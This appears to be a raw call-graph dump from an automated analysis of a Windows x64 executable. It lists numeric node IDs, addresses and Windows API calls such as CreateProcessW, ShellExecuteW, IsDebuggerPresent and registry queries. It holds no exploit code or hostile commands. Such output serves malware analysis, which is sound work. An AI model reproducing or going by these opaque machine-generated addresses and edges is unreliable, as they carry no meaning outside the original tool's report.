93866->93867 93870 7ff74d03b976 memcpy_s 93866->93870 93868 7ff74d07ef2a 93867->93868 93869 7ff74d054c68 4 API calls 93867->93869 93869->93870 93870->93833 93872 7ff74d0ab193 93871->93872 93873 7ff74d0ab19c WriteFile 93871->93873 93875 7ff74d0ab208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 93872->93875 93873->93659 93875->93873 93879 7ff74d0ac7c0 lstrlenW 93876->93879 93880 7ff74d0ac7dd GetFileAttributesW 93879->93880 93881 7ff74d0abdf5 93879->93881 93880->93881 93882 7ff74d0ac7eb FindFirstFileW 93880->93882 93881->93664 93882->93881 93883 7ff74d0ac7ff FindClose 93882->93883 93883->93881 93884->93680 93885->93684 93886->93689 93887->93698 93888->93692 93892 7ff74d0cf671 __scrt_get_show_window_mode 93889->93892 93890 7ff74d03d4cc 48 API calls 93891 7ff74d0cf74d 93890->93891 93958 7ff74d03e330 93891->93958 93892->93890 93894 7ff74d0cf759 93895 7ff74d0cf840 93894->93895 93896 7ff74d0cf762 93894->93896 93898 7ff74d0cf87d GetCurrentDirectoryW 93895->93898 93901 7ff74d03d4cc 48 API calls 93895->93901 93897 7ff74d03d4cc 48 API calls 93896->93897 93899 7ff74d0cf777 93897->93899 93900 7ff74d054c68 4 API calls 93898->93900 93902 7ff74d03e330 4 API calls 93899->93902 93903 7ff74d0cf8a7 GetCurrentDirectoryW 93900->93903 93904 7ff74d0cf85c 93901->93904 93906 7ff74d0cf783 93902->93906 93907 7ff74d0cf8b5 93903->93907 93905 7ff74d03e330 4 API calls 93904->93905 93908 7ff74d0cf868 93905->93908 93909 7ff74d03d4cc 48 API calls 93906->93909 93910 7ff74d0cf8f0 93907->93910 93971 7ff74d04f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93907->93971 93908->93898 93908->93910 93911 7ff74d0cf798 93909->93911 93915 7ff74d0cf905 93910->93915 93916 7ff74d0cf901 93910->93916 93913 7ff74d03e330 4 API calls 93911->93913 93917 7ff74d0cf7a4 93913->93917 93914 7ff74d0cf8d0 93972 7ff74d04f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93914->93972 93974 7ff74d0afddc 8 API calls 93915->93974 93923 7ff74d0cfa0f CreateProcessW 93916->93923 93924 7ff74d0cf972 93916->93924 93920 7ff74d03d4cc 48 API calls 93917->93920 93925 7ff74d0cf7b9 93920->93925 93921 7ff74d0cf8e0 93973 7ff74d04f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93921->93973 93922 7ff74d0cf90e 93975 7ff74d0afca8 8 API calls 93922->93975 93953 7ff74d0cf9b4 93923->93953 93977 7ff74d09d1f8 99 API calls 93924->93977 93929 7ff74d03e330 4 API calls 93925->93929 93930 7ff74d0cf7c5 93929->93930 93932 7ff74d0cf806 GetSystemDirectoryW 93930->93932 93934 7ff74d03d4cc 48 API calls 93930->93934 93931 7ff74d0cf926 93976 7ff74d0afafc 8 API calls ~SyncLockT 93931->93976 93936 7ff74d054c68 4 API calls 93932->93936 93937 7ff74d0cf7e1 93934->93937 93935 7ff74d0cf94f 93935->93916 93938 7ff74d0cf830 GetSystemDirectoryW 93936->93938 93940 7ff74d03e330 4 API calls 93937->93940 93938->93907 93939 7ff74d0cfabe CloseHandle 93942 7ff74d0cfaf5 93939->93942 93943 7ff74d0cfacc 93939->93943 93941 7ff74d0cf7ed 93940->93941 93941->93907 93941->93932 93944 7ff74d0cfafe 93942->93944 93948 7ff74d0cfb26 CloseHandle 93942->93948 93978 7ff74d0af7dc 93943->93978 93952 7ff74d0cfaa3 93944->93952 93946 7ff74d0cfa64 93949 7ff74d0cfa84 GetLastError 93946->93949 93948->93952 93949->93952 93962 7ff74d0af51c 93952->93962 93953->93939 93953->93946 93957->93701 93959 7ff74d03e342 93958->93959 93960 7ff74d054c68 4 API calls 93959->93960 93961 7ff74d03e361 wcscpy 93960->93961 93961->93894 93963 7ff74d0af7dc CloseHandle 93962->93963 93964 7ff74d0af52a 93963->93964 93983 7ff74d0af7b8 93964->93983 93967 7ff74d0af7b8 ~SyncLockT CloseHandle 93968 7ff74d0af53c 93967->93968 93969 7ff74d0af7b8 ~SyncLockT CloseHandle 93968->93969 93970 7ff74d0af545 93969->93970 93970->93702 93971->93914 93972->93921 93973->93910 93974->93922 93975->93931 93976->93935 93977->93953 93979 7ff74d0af7b8 ~SyncLockT CloseHandle 93978->93979 93980 7ff74d0af7ee 93979->93980 93981 7ff74d0af7b8 ~SyncLockT CloseHandle 93980->93981 93982 7ff74d0af7f7 93981->93982 93984 7ff74d0af533 93983->93984 93985 7ff74d0af7c9 CloseHandle 93983->93985 93984->93967 93985->93984 93986->93721 93987 7ff74d055328 94010 7ff74d054cac 93987->94010 93990 7ff74d055474 94042 7ff74d0557e4 7 API calls 2 library calls 93990->94042 93991 7ff74d055344 93993 7ff74d05547e 93991->93993 93995 7ff74d055362 93991->93995 94043 7ff74d0557e4 7 API calls 2 library calls 93993->94043 93996 7ff74d055387 93995->93996 94001 7ff74d0553a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 93995->94001 94018 7ff74d06ada4 93995->94018 93997 7ff74d055489 abort 93999 7ff74d05540d 94025 7ff74d055930 93999->94025 94001->93999 94039 7ff74d059204 35 API calls __InternalCxxFrameHandler 94001->94039 94002 7ff74d055412 94028 7ff74d033730 94002->94028 94007 7ff74d055435 94007->93997 94041 7ff74d054e90 8 API calls 2 library calls 94007->94041 94009 7ff74d05544c 94009->93996 94011 7ff74d054cce __scrt_initialize_crt 94010->94011 94044 7ff74d0565ec 94011->94044 94015 7ff74d054cd7 94015->93990 94015->93991 94019 7ff74d06adff 94018->94019 94020 7ff74d06ade0 94018->94020 94019->94001 94020->94019 94093 7ff74d031048 94020->94093 94098 7ff74d031064 94020->94098 94103 7ff74d0310e8 94020->94103 94108 7ff74d031080 94020->94108 94326 7ff74d056240 94025->94326 94029 7ff74d0337a3 94028->94029 94030 7ff74d033743 IsThemeActive 94028->94030 94040 7ff74d055974 GetModuleHandleW 94029->94040 94328 7ff74d0592d0 94030->94328 94036 7ff74d03377d 94340 7ff74d0337b0 94036->94340 94038 7ff74d033785 SystemParametersInfoW 94038->94029 94039->93999 94040->94007 94041->94009 94042->93993 94043->93997 94045 7ff74d0565f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 94044->94045 94057 7ff74d057290 94045->94057 94048 7ff74d054cd3 94048->94015 94052 7ff74d06ac84 94048->94052 94050 7ff74d05660c 94050->94048 94064 7ff74d0572d8 DeleteCriticalSection 94050->94064 94053 7ff74d074340 94052->94053 94054 7ff74d054ce0 94053->94054 94081 7ff74d06dd2c 94053->94081 94054->94015 94056 7ff74d056620 8 API calls 3 library calls 94054->94056 94056->94015 94058 7ff74d057298 94057->94058 94060 7ff74d0572c9 94058->94060 94061 7ff74d0565ff 94058->94061 94065 7ff74d057614 94058->94065 94070 7ff74d0572d8 DeleteCriticalSection 94060->94070 94061->94048 94063 7ff74d057218 8 API calls 3 library calls 94061->94063 94063->94050 94064->94048 94071 7ff74d057310 94065->94071 94068 7ff74d057654 94068->94058 94069 7ff74d05765f InitializeCriticalSectionAndSpinCount 94069->94068 94070->94061 94072 7ff74d05736c try_get_function 94071->94072 94073 7ff74d057371 94071->94073 94072->94073 94074 7ff74d0573a0 LoadLibraryExW 94072->94074 94077 7ff74d057454 94072->94077 94079 7ff74d057439 FreeLibrary 94072->94079 94080 7ff74d0573fb LoadLibraryExW 94072->94080 94073->94068 94073->94069 94074->94072 94075 7ff74d0573c1 GetLastError 94074->94075 94075->94072 94076 7ff74d057462 GetProcAddress 94078 7ff74d057473 94076->94078 94077->94073 94077->94076 94078->94073 94079->94072 94080->94072 94092 7ff74d06b9bc EnterCriticalSection 94081->94092 94083 7ff74d06dd3c 94084 7ff74d06e258 32 API calls 94083->94084 94085 7ff74d06dd45 94084->94085 94087 7ff74d06db44 34 API calls 94085->94087 94091 7ff74d06dd53 94085->94091 94086 7ff74d06ba10 _isindst LeaveCriticalSection 94088 7ff74d06dd5f 94086->94088 94089 7ff74d06dd4e 94087->94089 94088->94053 94090 7ff74d06dc30 GetStdHandle GetFileType 94089->94090 94090->94091 94091->94086 94113 7ff74d037718 94093->94113 94097 7ff74d054f15 94097->94020 94132 7ff74d037ec0 94098->94132 94100 7ff74d03106d 94168 7ff74d054ebc 34 API calls _onexit 94100->94168 94102 7ff74d054f15 94102->94020 94237 7ff74d051d80 94103->94237 94107 7ff74d054f15 94107->94020 94262 7ff74d037920 94108->94262 94110 7ff74d03109e 94292 7ff74d054ebc 34 API calls _onexit 94110->94292 94112 7ff74d054f15 94112->94020 94114 7ff74d039640 4 API calls 94113->94114 94115 7ff74d03778f 94114->94115 94121 7ff74d036f24 94115->94121 94118 7ff74d03782c 94119 7ff74d031051 94118->94119 94124 7ff74d037410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94118->94124 94120 7ff74d054ebc 34 API calls _onexit 94119->94120 94120->94097 94125 7ff74d036f60 94121->94125 94124->94118 94126 7ff74d036f52 94125->94126 94127 7ff74d036f85 94125->94127 94126->94118 94127->94126 94128 7ff74d036f93 RegOpenKeyExW 94127->94128 94128->94126 94129 7ff74d036faf RegQueryValueExW 94128->94129 94130 7ff74d036fdd 94129->94130 94131 7ff74d036ff5 RegCloseKey 94129->94131 94130->94131 94131->94126 94169 7ff74d0382b4 94132->94169 94135 7ff74d0382b4 4 API calls 94136 7ff74d037f3a 94135->94136 94137 7ff74d039640 4 API calls 94136->94137 94138 7ff74d037f46 94137->94138 94176 7ff74d037cf4 94138->94176 94140 7ff74d037f59 94186 7ff74d052d5c 6 API calls 94140->94186 94142 7ff74d037fa5 94143 7ff74d039640 4 API calls 94142->94143 94144 7ff74d037fb1 94143->94144 94145 7ff74d039640 4 API calls 94144->94145 94146 7ff74d037fbd 94145->94146 94147 7ff74d039640 4 API calls 94146->94147 94148 7ff74d037fc9 94147->94148 94149 7ff74d039640 4 API calls 94148->94149 94150 7ff74d03800f 94149->94150 94151 7ff74d039640 4 API calls 94150->94151 94152 7ff74d0380f7 94151->94152 94187 7ff74d04ef88 94152->94187 94154 7ff74d038103 94194 7ff74d04eec8 94154->94194 94156 7ff74d03812f 94157 7ff74d039640 4 API calls 94156->94157 94158 7ff74d03813b 94157->94158 94205 7ff74d046d40 94158->94205 94162 7ff74d0381ac 94163 7ff74d0381be GetStdHandle 94162->94163 94164 7ff74d038220 OleInitialize 94163->94164 94165 7ff74d07d350 94163->94165 94164->94100 94222 7ff74d0affc8 CreateThread 94165->94222 94167 7ff74d07d367 CloseHandle 94168->94102 94170 7ff74d039640 4 API calls 94169->94170 94171 7ff74d0382c6 94170->94171 94172 7ff74d039640 4 API calls 94171->94172 94173 7ff74d0382cf 94172->94173 94174 7ff74d039640 4 API calls 94173->94174 94175 7ff74d037f2e 94174->94175 94175->94135 94177 7ff74d037d0d 94176->94177 94178 7ff74d07d2c8 94176->94178 94181 7ff74d037d24 94177->94181 94183 7ff74d037d51 94177->94183 94224 7ff74d03dda4 94178->94224 94180 7ff74d07d2d3 94223 7ff74d037e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94181->94223 94183->94180 94185 7ff74d054c68 4 API calls 94183->94185 94184 7ff74d037d2f memcpy_s 94184->94140 94185->94184 94186->94142 94188 7ff74d039640 4 API calls 94187->94188 94189 7ff74d04efa3 94188->94189 94190 7ff74d039640 4 API calls 94189->94190 94191 7ff74d04efac 94190->94191 94192 7ff74d039640 4 API calls 94191->94192 94193 7ff74d04f02e 94192->94193 94193->94154 94195 7ff74d04eede 94194->94195 94196 7ff74d039640 4 API calls 94195->94196 94197 7ff74d04eeea 94196->94197 94198 7ff74d039640 4 API calls 94197->94198 94199 7ff74d04eef6 94198->94199 94200 7ff74d039640 4 API calls 94199->94200 94201 7ff74d04ef02 94200->94201 94202 7ff74d039640 4 API calls 94201->94202 94203 7ff74d04ef0e 94202->94203 94204 7ff74d04ef68 RegisterWindowMessageW 94203->94204 94204->94156 94206 7ff74d046db9 94205->94206 94207 7ff74d046d80 94205->94207 94233 7ff74d055114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94206->94233 94214 7ff74d03816b 94207->94214 94234 7ff74d055114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94207->94234 94215 7ff74d0539a8 94214->94215 94216 7ff74d09a502 94215->94216 94221 7ff74d0539cc 94215->94221 94235 7ff74d03ee20 5 API calls Concurrency::wait 94216->94235 94218 7ff74d09a50e 94236 7ff74d03ee20 5 API calls Concurrency::wait 94218->94236 94220 7ff74d09a52d 94221->94162 94222->94167 94223->94184 94225 7ff74d03dda9 94224->94225 94227 7ff74d03ddc7 memcpy_s 94224->94227 94225->94227 94228 7ff74d03a7c0 94225->94228 94227->94180 94230 7ff74d03a7ed 94228->94230 94232 7ff74d03a7dd memcpy_s 94228->94232 94229 7ff74d07e7da 94230->94229 94231 7ff74d054c68 4 API calls 94230->94231 94231->94232 94232->94227 94235->94218 94236->94220 94238 7ff74d039640 4 API calls 94237->94238 94239 7ff74d051db2 GetVersionExW 94238->94239 94240 7ff74d037cf4 4 API calls 94239->94240 94242 7ff74d051dfc 94240->94242 94241 7ff74d03dda4 4 API calls 94241->94242 94242->94241 94243 7ff74d051e87 94242->94243 94244 7ff74d03dda4 4 API calls 94243->94244 94249 7ff74d051ea4 94244->94249 94245 7ff74d099645 94246 7ff74d09964f 94245->94246 94260 7ff74d0a32f4 LoadLibraryA GetProcAddress 94246->94260 94247 7ff74d051f3c GetCurrentProcess IsWow64Process 94248 7ff74d051f7e __scrt_get_show_window_mode 94247->94248 94248->94246 94250 7ff74d051f86 GetSystemInfo 94248->94250 94249->94245 94249->94247 94252 7ff74d0310f1 94250->94252 94259 7ff74d054ebc 34 API calls _onexit 94252->94259 94253 7ff74d0996b1 94254 7ff74d0996b5 94253->94254 94255 7ff74d0996d7 GetSystemInfo 94253->94255 94261 7ff74d0a32f4 LoadLibraryA GetProcAddress 94254->94261 94257 7ff74d0996bf 94255->94257 94257->94252 94258 7ff74d0996f0 FreeLibrary 94257->94258 94258->94252 94259->94107 94260->94253 94261->94257 94263 7ff74d037948 wcsftime 94262->94263 94264 7ff74d039640 4 API calls 94263->94264 94265 7ff74d037a02 94264->94265 94293 7ff74d035680 94265->94293 94267 7ff74d037a0c 94300 7ff74d053a38 94267->94300 94270 7ff74d0371f8 4 API calls 94271 7ff74d037a2c 94270->94271 94306 7ff74d034680 94271->94306 94273 7ff74d037a3d 94274 7ff74d039640 4 API calls 94273->94274 94275 7ff74d037a47 94274->94275 94310 7ff74d03a854 94275->94310 94278 7ff74d07d05c RegQueryValueExW 94279 7ff74d07d131 RegCloseKey 94278->94279 94280 7ff74d07d08f 94278->94280 94283 7ff74d037a83 Concurrency::wait 94279->94283 94288 7ff74d07d147 wcscat Concurrency::wait 94279->94288 94281 7ff74d054c68 4 API calls 94280->94281 94282 7ff74d07d0b2 94281->94282 94284 7ff74d07d0bf RegQueryValueExW 94282->94284 94283->94110 94285 7ff74d07d0f3 94284->94285 94287 7ff74d07d112 94284->94287 94286 7ff74d037cf4 4 API calls 94285->94286 94286->94287 94287->94279 94288->94283 94289 7ff74d03ec00 4 API calls 94288->94289 94290 7ff74d034680 4 API calls 94288->94290 94291 7ff74d039d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94288->94291 94289->94288 94290->94288 94291->94288 94292->94112 94314 7ff74d078f90 94293->94314 94296 7ff74d03ec00 4 API calls 94297 7ff74d0356b4 94296->94297 94316 7ff74d0356d4 94297->94316 94299 7ff74d0356c1 Concurrency::wait 94299->94267 94301 7ff74d078f90 wcsftime 94300->94301 94302 7ff74d053a44 GetFullPathNameW 94301->94302 94303 7ff74d053a74 94302->94303 94304 7ff74d037cf4 4 API calls 94303->94304 94305 7ff74d037a1b 94304->94305 94305->94270 94307 7ff74d03469f 94306->94307 94309 7ff74d0346c8 memcpy_s 94306->94309 94308 7ff74d054c68 4 API calls 94307->94308 94308->94309 94309->94273 94311 7ff74d03a87a 94310->94311 94313 7ff74d037a51 RegOpenKeyExW 94310->94313 94312 7ff74d054c68 4 API calls 94311->94312 94312->94313 94313->94278 94313->94283 94315 7ff74d03568c GetModuleFileNameW 94314->94315 94315->94296 94317 7ff74d078f90 wcsftime 94316->94317 94318 7ff74d0356e9 GetFullPathNameW 94317->94318 94319 7ff74d07c03a 94318->94319 94320 7ff74d035712 94318->94320 94322 7ff74d03a854 4 API calls 94319->94322 94321 7ff74d037cf4 4 API calls 94320->94321 94323 7ff74d03571c 94321->94323 94322->94323 94323->94323 94324 7ff74d03dda4 4 API calls 94323->94324 94325 7ff74d035785 94324->94325 94325->94299 94327 7ff74d055947 GetStartupInfoW 94326->94327 94327->94002 94386 7ff74d06b9bc EnterCriticalSection 94328->94386 94330 7ff74d0592e4 94331 7ff74d06ba10 _isindst LeaveCriticalSection 94330->94331 94332 7ff74d03376e 94331->94332 94333 7ff74d059334 94332->94333 94334 7ff74d05933d 94333->94334 94335 7ff74d033778 94333->94335 94387 7ff74d0655d4 15 API calls abort 94334->94387 94339 7ff74d0336e8 SystemParametersInfoW SystemParametersInfoW 94335->94339 94337 7ff74d059342 94388 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94337->94388 94339->94036 94341 7ff74d0337cd wcsftime 94340->94341 94342 7ff74d039640 4 API calls 94341->94342 94343 7ff74d0337dd GetCurrentDirectoryW 94342->94343 94389 7ff74d0357a0 94343->94389 94345 7ff74d033807 IsDebuggerPresent 94346 7ff74d07b872 MessageBoxA 94345->94346 94347 7ff74d033815 94345->94347 94348 7ff74d07b894 94346->94348 94347->94348 94349 7ff74d033839 94347->94349 94499 7ff74d03e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94348->94499 94463 7ff74d033f04 94349->94463 94353 7ff74d033860 GetFullPathNameW 94354 7ff74d037cf4 4 API calls 94353->94354 94355 7ff74d0338a6 94354->94355 94479 7ff74d033f9c 94355->94479 94356 7ff74d0338bf 94358 7ff74d07b8dc SetCurrentDirectoryW 94356->94358 94359 7ff74d0338c7 94356->94359 94358->94359 94360 7ff74d0338d0 94359->94360 94500 7ff74d09d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 94359->94500 94495 7ff74d033b84 7 API calls 94360->94495 94363 7ff74d07b8f8 94363->94360 94366 7ff74d07b90c 94363->94366 94368 7ff74d035680 6 API calls 94366->94368 94367 7ff74d0338da 94370 7ff74d036258 46 API calls 94367->94370 94373 7ff74d0338ef 94367->94373 94369 7ff74d07b916 94368->94369 94371 7ff74d03ec00 4 API calls 94369->94371 94370->94373 94372 7ff74d07b927 94371->94372 94375 7ff74d07b94d 94372->94375 94376 7ff74d07b930 94372->94376 94374 7ff74d033913 94373->94374 94377 7ff74d035d88 Shell_NotifyIconW 94373->94377 94379 7ff74d03391f SetCurrentDirectoryW 94374->94379 94381 7ff74d0371f8 4 API calls 94375->94381 94378 7ff74d0371f8 4 API calls 94376->94378 94377->94374 94380 7ff74d07b93c 94378->94380 94382 7ff74d033934 Concurrency::wait 94379->94382 94501 7ff74d037c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94380->94501 94384 7ff74d07b963 GetForegroundWindow ShellExecuteW 94381->94384 94382->94038 94385 7ff74d07b99f Concurrency::wait 94384->94385 94385->94374 94387->94337 94388->94335 94390 7ff74d039640 4 API calls 94389->94390 94391 7ff74d0357d7 94390->94391 94502 7ff74d039bbc 94391->94502 94393 7ff74d0357fe 94394 7ff74d035680 6 API calls 94393->94394 94395 7ff74d035812 94394->94395 94396 7ff74d03ec00 4 API calls 94395->94396 94397 7ff74d035823 94396->94397 94516 7ff74d036460 94397->94516 94400 7ff74d07c05e 94589 7ff74d0b2948 94400->94589 94401 7ff74d03584e Concurrency::wait 94405 7ff74d03e0a8 4 API calls 94401->94405 94403 7ff74d07c074 94404 7ff74d07c081 94403->94404 94406 7ff74d03652c 63 API calls 94403->94406 94607 7ff74d03652c 94404->94607 94407 7ff74d03586a 94405->94407 94406->94404 94409 7ff74d03ec00 4 API calls 94407->94409 94410 7ff74d035888 94409->94410 94414 7ff74d07c099 94410->94414 94542 7ff74d03eff8 94410->94542 94412 7ff74d0358ad Concurrency::wait 94413 7ff74d03ec00 4 API calls 94412->94413 94415 7ff74d0358d7 94413->94415 94417 7ff74d035ab4 4 API calls 94414->94417 94415->94414 94416 7ff74d03eff8 46 API calls 94415->94416 94419 7ff74d0358fc Concurrency::wait 94416->94419 94418 7ff74d07c0e1 94417->94418 94420 7ff74d035ab4 4 API calls 94418->94420 94422 7ff74d039640 4 API calls 94419->94422 94421 7ff74d07c103 94420->94421 94425 7ff74d035680 6 API calls 94421->94425 94423 7ff74d03591f 94422->94423 94555 7ff74d035ab4 94423->94555 94428 7ff74d07c12b 94425->94428 94430 7ff74d035ab4 4 API calls 94428->94430 94429 7ff74d035941 94429->94414 94432 7ff74d035949 94429->94432 94431 7ff74d07c139 94430->94431 94433 7ff74d03e0a8 4 API calls 94431->94433 94434 7ff74d058e28 wcsftime 37 API calls 94432->94434 94435 7ff74d07c14a 94433->94435 94436 7ff74d035958 94434->94436 94437 7ff74d035ab4 4 API calls 94435->94437 94436->94418 94438 7ff74d035960 94436->94438 94439 7ff74d07c15b 94437->94439 94440 7ff74d058e28 wcsftime 37 API calls 94438->94440 94443 7ff74d03e0a8 4 API calls 94439->94443 94441 7ff74d03596f 94440->94441 94441->94421 94442 7ff74d035977 94441->94442 94444 7ff74d058e28 wcsftime 37 API calls 94442->94444 94445 7ff74d07c172 94443->94445 94446 7ff74d035986 94444->94446 94447 7ff74d035ab4 4 API calls 94445->94447 94448 7ff74d0359c6 94446->94448 94451 7ff74d035ab4 4 API calls 94446->94451 94450 7ff74d07c183 94447->94450 94448->94439 94449 7ff74d0359d3 94448->94449 94578 7ff74d03df90 94449->94578 94452 7ff74d0359a8 94451->94452 94453 7ff74d03e0a8 4 API calls 94452->94453 94455 7ff74d0359b5 94453->94455 94456 7ff74d035ab4 4 API calls 94455->94456 94456->94448 94459 7ff74d035a12 94460 7ff74d03d670 5 API calls 94459->94460 94461 7ff74d035ab4 4 API calls 94459->94461 94462 7ff74d035a60 Concurrency::wait 94459->94462 94460->94459 94461->94459 94462->94345 94464 7ff74d033f29 wcsftime 94463->94464 94465 7ff74d033f4b 94464->94465 94466 7ff74d07ba2c __scrt_get_show_window_mode 94464->94466 94467 7ff74d0356d4 5 API calls 94465->94467 94468 7ff74d07ba4d GetOpenFileNameW 94466->94468 94469 7ff74d033f56 94467->94469 94470 7ff74d033858 94468->94470 94471 7ff74d07bab0 94468->94471 94951 7ff74d033eb4 94469->94951 94470->94353 94470->94356 94473 7ff74d037cf4 4 API calls 94471->94473 94475 7ff74d07babc 94473->94475 94477 7ff74d033f6c 94969 7ff74d036394 94477->94969 94480 7ff74d033fb6 wcsftime 94479->94480 95012 7ff74d039734 94480->95012 94482 7ff74d033fc4 94494 7ff74d034050 94482->94494 95022 7ff74d034d28 77 API calls 94482->95022 94484 7ff74d033fd3 94484->94494 95023 7ff74d034b0c 79 API calls Concurrency::wait 94484->95023 94486 7ff74d033fe0 94487 7ff74d033fe8 GetFullPathNameW 94486->94487 94486->94494 94488 7ff74d037cf4 4 API calls 94487->94488 94489 7ff74d034014 94488->94489 94490 7ff74d037cf4 4 API calls 94489->94490 94491 7ff74d034028 94490->94491 94492 7ff74d07bac2 wcscat 94491->94492 94493 7ff74d037cf4 4 API calls 94491->94493 94493->94494 94494->94356 95027 7ff74d033d90 7 API calls 94495->95027 94497 7ff74d0338d5 94498 7ff74d033cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94497->94498 94499->94356 94500->94363 94501->94375 94503 7ff74d039be5 wcsftime 94502->94503 94504 7ff74d037cf4 4 API calls 94503->94504 94505 7ff74d039c1b 94503->94505 94504->94505 94515 7ff74d039c4a Concurrency::wait 94505->94515 94613 7ff74d039d84 94505->94613 94507 7ff74d03ec00 4 API calls 94508 7ff74d039d4a 94507->94508 94510 7ff74d034680 4 API calls 94508->94510 94509 7ff74d03ec00 4 API calls 94509->94515 94511 7ff74d039d57 Concurrency::wait 94510->94511 94511->94393 94512 7ff74d034680 4 API calls 94512->94515 94513 7ff74d039d21 94513->94507 94513->94511 94514 7ff74d039d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94514->94515 94515->94509 94515->94512 94515->94513 94515->94514 94616 7ff74d036d64 94516->94616 94519 7ff74d03649d 94520 7ff74d0364ba FreeLibrary 94519->94520 94521 7ff74d0364c0 94519->94521 94520->94521 94620 7ff74d0648e0 94521->94620 94522 7ff74d036d64 2 API calls 94522->94519 94525 7ff74d0364db LoadLibraryExW 94639 7ff74d036cc4 94525->94639 94526 7ff74d07c8f6 94528 7ff74d03652c 63 API calls 94526->94528 94529 7ff74d07c8fe 94528->94529 94531 7ff74d036cc4 3 API calls 94529->94531 94535 7ff74d07c907 94531->94535 94533 7ff74d036505 94534 7ff74d036512 94533->94534 94533->94535 94537 7ff74d03652c 63 API calls 94534->94537 94661 7ff74d0367d8 94535->94661 94539 7ff74d035846 94537->94539 94539->94400 94539->94401 94541 7ff74d07c93f 94864 7ff74d041a30 94542->94864 94544 7ff74d03f029 94545 7ff74d08a7a8 94544->94545 94546 7ff74d03f040 94544->94546 94880 7ff74d03ee20 5 API calls Concurrency::wait 94545->94880 94549 7ff74d054c68 4 API calls 94546->94549 94548 7ff74d08a7bc 94550 7ff74d03f066 94549->94550 94552 7ff74d03f08f 94550->94552 94879 7ff74d03f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94550->94879 94875 7ff74d03f1bc 94552->94875 94554 7ff74d03f0c6 94554->94412 94556 7ff74d035ac6 94555->94556 94557 7ff74d035ae4 94555->94557 94558 7ff74d03e0a8 4 API calls 94556->94558 94559 7ff74d037cf4 4 API calls 94557->94559 94560 7ff74d03592d 94558->94560 94559->94560 94561 7ff74d058e28 94560->94561 94562 7ff74d058ea4 94561->94562 94563 7ff74d058e3f 94561->94563 94884 7ff74d058d98 35 API calls 2 library calls 94562->94884 94570 7ff74d058e63 94563->94570 94882 7ff74d0655d4 15 API calls abort 94563->94882 94566 7ff74d058ed6 94568 7ff74d058ee2 94566->94568 94576 7ff74d058ef9 94566->94576 94567 7ff74d058e49 94883 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94567->94883 94885 7ff74d0655d4 15 API calls abort 94568->94885 94570->94429 94572 7ff74d058e54 94572->94429 94573 7ff74d058ee7 94886 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94573->94886 94575 7ff74d062c80 37 API calls wcsftime 94575->94576 94576->94575 94577 7ff74d058ef2 94576->94577 94577->94429 94579 7ff74d03dfac 94578->94579 94580 7ff74d054c68 4 API calls 94579->94580 94581 7ff74d0359f5 94579->94581 94580->94581 94582 7ff74d03d670 94581->94582 94583 7ff74d03d698 94582->94583 94587 7ff74d03d6a2 94583->94587 94887 7ff74d03880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94583->94887 94586 7ff74d089d43 94588 7ff74d03d7de 94587->94588 94888 7ff74d03ee20 5 API calls Concurrency::wait 94587->94888 94588->94459 94590 7ff74d0b29c8 94589->94590 94889 7ff74d0b2b70 94590->94889 94593 7ff74d0367d8 45 API calls 94594 7ff74d0b2a03 94593->94594 94595 7ff74d0367d8 45 API calls 94594->94595 94596 7ff74d0b2a23 94595->94596 94597 7ff74d0367d8 45 API calls 94596->94597 94598 7ff74d0b2a49 94597->94598 94599 7ff74d0367d8 45 API calls 94598->94599 94600 7ff74d0b2a6d 94599->94600 94601 7ff74d0367d8 45 API calls 94600->94601 94602 7ff74d0b2ac5 94601->94602 94603 7ff74d0b240c 32 API calls 94602->94603 94604 7ff74d0b2ada 94603->94604 94606 7ff74d0b29de 94604->94606 94894 7ff74d0b1d48 94604->94894 94606->94403 94608 7ff74d03653d 94607->94608 94609 7ff74d036542 94607->94609 94610 7ff74d064970 62 API calls 94608->94610 94611 7ff74d036558 94609->94611 94612 7ff74d03656f FreeLibrary 94609->94612 94610->94609 94611->94414 94612->94611 94614 7ff74d03a7c0 4 API calls 94613->94614 94615 7ff74d039d99 94614->94615 94615->94505 94617 7ff74d036490 94616->94617 94618 7ff74d036d74 LoadLibraryA 94616->94618 94617->94519 94617->94522 94618->94617 94619 7ff74d036d89 GetProcAddress 94618->94619 94619->94617 94621 7ff74d0647fc 94620->94621 94622 7ff74d06482a 94621->94622 94625 7ff74d06485c 94621->94625 94681 7ff74d0655d4 15 API calls abort 94622->94681 94624 7ff74d06482f 94682 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94624->94682 94626 7ff74d06486f 94625->94626 94627 7ff74d064862 94625->94627 94669 7ff74d06feb4 94626->94669 94683 7ff74d0655d4 15 API calls abort 94627->94683 94631 7ff74d0364cf 94631->94525 94631->94526 94633 7ff74d064883 94684 7ff74d0655d4 15 API calls abort 94633->94684 94634 7ff74d064890 94676 7ff74d070304 94634->94676 94637 7ff74d0648a3 94685 7ff74d05df60 LeaveCriticalSection 94637->94685 94823 7ff74d036d1c 94639->94823 94642 7ff74d036cf1 94644 7ff74d036d0f FreeLibrary 94642->94644 94645 7ff74d0364f7 94642->94645 94643 7ff74d036d1c 2 API calls 94643->94642 94644->94645 94646 7ff74d036580 94645->94646 94647 7ff74d054c68 4 API calls 94646->94647 94648 7ff74d0365b5 memcpy_s 94647->94648 94649 